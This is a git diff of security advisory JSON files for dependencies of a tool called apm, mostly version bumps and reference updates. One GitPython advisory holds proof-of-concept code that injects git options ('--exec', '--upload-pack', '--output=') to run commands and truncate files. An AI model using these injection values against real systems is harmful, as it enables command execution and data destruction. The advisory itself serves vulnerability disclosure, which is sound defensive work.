"ecosystem": "PyPI", - "name": "apm-cli", - "subject_version": "0.29.0", - "key": "pkg:pypi/apm-cli@0.29.0" + "subject_version": "0.30.0", + "key": "pkg:pypi/apm-cli@0.30.0" } ] }, diff --git a/advisories/BREW-apm-CVE-2026-4539.json b/advisories/BREW-apm-CVE-2026-4539.json index cdf1d355947..6e4b40b5dd6 100644 --- a/advisories/BREW-apm-CVE-2026-4539.json +++ b/advisories/BREW-apm-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-4539", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-45409.json b/advisories/BREW-apm-CVE-2026-45409.json index 14b980aebe6..61386120865 100644 --- a/advisories/BREW-apm-CVE-2026-45409.json +++ b/advisories/BREW-apm-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-45409", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-46383.json b/advisories/BREW-apm-CVE-2026-46383.json index db628c1ab95..3a1bb586b1b 100644 --- a/advisories/BREW-apm-CVE-2026-46383.json +++ b/advisories/BREW-apm-CVE-2026-46383.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-46383", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "CVE-2026-46383", "GHSA-mq5j-pw29-jcv3", @@ -44,22 +44,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/microsoft/apm", - "subject_version": "0.29.0", + "subject_version": "0.30.0", "key": "https://github.com/microsoft/apm" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "apm-cli", - "subject_version": "0.29.0", - "key": "pkg:pypi/apm-cli@0.29.0" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apm-cli", - "subject_version": "0.29.0", - "key": "pkg:pypi/apm-cli@0.29.0" + "subject_version": "0.30.0", + "key": "pkg:pypi/apm-cli@0.30.0" } ] }, diff --git a/advisories/BREW-apm-CVE-2026-47265.json b/advisories/BREW-apm-CVE-2026-47265.json index 969492c47a2..bae377fa871 100644 --- a/advisories/BREW-apm-CVE-2026-47265.json +++ b/advisories/BREW-apm-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-47265", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-50269.json b/advisories/BREW-apm-CVE-2026-50269.json index 4f684b6b242..69ab9d88bf2 100644 --- a/advisories/BREW-apm-CVE-2026-50269.json +++ b/advisories/BREW-apm-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-50269", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54273.json b/advisories/BREW-apm-CVE-2026-54273.json index d5560d69dc6..b66070e8523 100644 --- a/advisories/BREW-apm-CVE-2026-54273.json +++ b/advisories/BREW-apm-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54273", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54274.json b/advisories/BREW-apm-CVE-2026-54274.json index 0abd11690e8..722bb9e04f5 100644 --- a/advisories/BREW-apm-CVE-2026-54274.json +++ b/advisories/BREW-apm-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54274", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54275.json b/advisories/BREW-apm-CVE-2026-54275.json index 81e3200910d..66fbb3df172 100644 --- a/advisories/BREW-apm-CVE-2026-54275.json +++ b/advisories/BREW-apm-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54275", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54276.json b/advisories/BREW-apm-CVE-2026-54276.json index 4a0d7897cf8..401a0839bcd 100644 --- a/advisories/BREW-apm-CVE-2026-54276.json +++ b/advisories/BREW-apm-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54276", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54277.json b/advisories/BREW-apm-CVE-2026-54277.json index 6bb55feb680..a4b7f53a096 100644 --- a/advisories/BREW-apm-CVE-2026-54277.json +++ b/advisories/BREW-apm-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54277", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54278.json b/advisories/BREW-apm-CVE-2026-54278.json index 0907f7eaa4c..364fb8b4d89 100644 --- a/advisories/BREW-apm-CVE-2026-54278.json +++ b/advisories/BREW-apm-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54278", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54279.json b/advisories/BREW-apm-CVE-2026-54279.json index 4f225fa20cc..b235910ec41 100644 --- a/advisories/BREW-apm-CVE-2026-54279.json +++ b/advisories/BREW-apm-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54279", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-54280.json b/advisories/BREW-apm-CVE-2026-54280.json index 7b9e4aa6c0b..c50c4531871 100644 --- a/advisories/BREW-apm-CVE-2026-54280.json +++ b/advisories/BREW-apm-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-54280", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-59881.json b/advisories/BREW-apm-CVE-2026-59881.json index 8f50895bd1a..0092b467477 100644 --- a/advisories/BREW-apm-CVE-2026-59881.json +++ b/advisories/BREW-apm-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-59881", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-59890.json b/advisories/BREW-apm-CVE-2026-59890.json index 804f9f0584a..860e95e50c2 100644 --- a/advisories/BREW-apm-CVE-2026-59890.json +++ b/advisories/BREW-apm-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-59890", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-67322.json b/advisories/BREW-apm-CVE-2026-67322.json index feaf7350749..ecaa3fb7df0 100644 --- a/advisories/BREW-apm-CVE-2026-67322.json +++ b/advisories/BREW-apm-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-67322", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.52", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-apm-CVE-2026-67323.json b/advisories/BREW-apm-CVE-2026-67323.json index 032cb9241d9..5b221be52da 100644 --- a/advisories/BREW-apm-CVE-2026-67323.json +++ b/advisories/BREW-apm-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-67323", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-apm-CVE-2026-67324.json b/advisories/BREW-apm-CVE-2026-67324.json index be738c64e3c..064b640fb58 100644 --- a/advisories/BREW-apm-CVE-2026-67324.json +++ b/advisories/BREW-apm-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-67324", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-67325.json b/advisories/BREW-apm-CVE-2026-67325.json index 36607ea1658..397ac240754 100644 --- a/advisories/BREW-apm-CVE-2026-67325.json +++ b/advisories/BREW-apm-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-67325", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", 